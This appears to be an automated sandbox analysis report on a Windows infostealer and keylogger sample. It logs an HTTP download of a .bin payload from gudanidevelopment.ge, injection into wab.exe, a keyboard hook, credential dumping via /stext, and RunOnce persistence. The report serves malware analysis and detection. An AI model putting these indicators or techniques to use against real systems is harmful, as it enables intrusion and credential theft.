              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/de-ch/homepage/secure/silentpassport?secure=true&lc=2055
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/https://
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/https://www.msn.com/de-c
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
              Source: unknown DNS traffic detected: queries for: gudanidevelopment.ge
              Source: global traffic HTTP traffic detected: GET /IogvoayYhe139.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Host: gudanidevelopment.ge Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,9_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00406B9A EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_00406B9A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00406C3D EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,10_2_00406C3D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_004072B5
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe Code function: 5_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_00405461

              E-Banking Fraud

              Source: Yara match File source: 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: wab.exe PID: 2856, type: MEMORYSTR
              Source: Yara match File source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe Code function: 5_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040338F
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03DB916E Sleep,NtProtectVirtualMemory,7_2_03DB916E
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_00401806 NtdllDefWindowProc_W,9_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_004018C0 NtdllDefWindowProc_W,9_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_004016FC NtdllDefWindowProc_A,10_2_004016FC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_004017B6 NtdllDefWindowProc_A,10_2_004017B6
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00402CAC NtdllDefWindowProc_A,11_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00402D66 NtdllDefWindowProc_A,11_2_00402D66
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe Static PE information: Resource name: RT_VERSION type: VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79
              Source: Tramper.exe.7.dr Static PE information: Resource name: RT_VERSION type: VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process Stats: CPU usage > 6%
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe Section loaded: edgegdi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edgegdi.dll
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe Virustotal: Detection: 20%
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe File read: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit graph_10-33004
              Source: unknown Process created: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oicgkvnekjmivsgoxokizzeblgyngayb
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rdhzl
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bxujegjz
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,11_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe File created: C:\Users\user\AppData\Local\Temp\nsu1FBE.tmp
              Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@9/19@4/3
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe Code function: 5_2_00402104 CoCreateInstance,5_2_00402104
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe Code function: 5_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,5_2_00404722
              Source: wab.exe, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000007.00000002.54485525601.0000000035210000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: wab.exe, 00000009.00000003.49632395621.00000000059B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,9_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,9_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\ourvbpld-RBN2WW
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,9_2_0040B58D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              Source: Yara matchFile source: Process Memory Space: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe PID: 8164, type: MEMORYSTR
              Source: Yara matchFile source: 00000005.00000002.49572727235.0000000003718000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D2806 push ecx; ret 7_2_352D2819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044693D push ecx; ret 9_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044DB70 push eax; ret 9_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044DB70 push eax; ret 9_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00451D54 push eax; ret 9_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00444355 push ecx; ret 10_2_00444365
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004446D0 push eax; ret 10_2_004446E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004446D0 push eax; ret 10_2_0044470C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044AC84 push eax; ret 10_2_0044AC91
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00414060 push eax; ret 11_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00414060 push eax; ret 11_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00414039 push ecx; ret 11_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004164EB push 0000006Ah; retf 11_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00416553 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00416555 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_6F261B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,5_2_6F261B5F
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe | File created: C:\Users\user\AppData\Local\Temp\nsk21A3.tmp\System.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Users\user\AppData\Local\Temp\Gummibaand\Tramper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Sundhedspolitikken
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_004047C6
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5928 | Thread sleep count: 3601 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1088 | Thread sleep count: 62 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1088 | Thread sleep time: -31000s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5108 | Thread sleep time: -57000s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5108 | Thread sleep count: 5323 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5108 | Thread sleep time: -15969000s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread sleep count: Count: 3601 delay: -5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 3601
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 5323
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: foregroundWindowGot 1741
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | API coverage: 9.7 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information queried: ProcessInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00418981 memset,GetSystemInfo,9_2_00418981
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_004059CC
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_004065FD FindFirstFileW,FindClose,5_2_004065FD
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_352D10F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D6580 FindFirstFileExA,7_2_352D6580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeAPI call chain: ExitProcess graph end nodegraph_5-4322
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeAPI call chain: ExitProcess graph end nodegraph_5-4327
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_10-33898
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\paqlgkfs.dat
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Temp\bxujegjz
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Temp\rdhzl
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.54464219226.0000000000A46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_352D60E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_6F261B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,5_2_6F261B5F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D724E GetProcessHeap,7_2_352D724E
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D4AB4 mov eax, dword ptr fs:[00000030h]7_2_352D4AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_352D60E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_352D2B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_352D2639

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe | Section loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Program Files (x86)\Windows Mail\wab.exe protection: read write
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3030000
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 7E3008
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oicgkvnekjmivsgoxokizzeblgyngayb
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rdhzl
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bxujegjz
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managere
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, paqlgkfs.dat.7.drBinary or memory string: [2023/10/26 14:28:54 Program Manager]
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerinutes
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerW
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerknown.
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A66000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.54464219226.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 00000007.00000003.49587174194.0000000000AB1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.54464219226.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.49587142774.0000000000AAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2023/10/26 14:28:49 Program Manager]
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_352D2933 cpuid 7_2_352D2933
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_352D2264
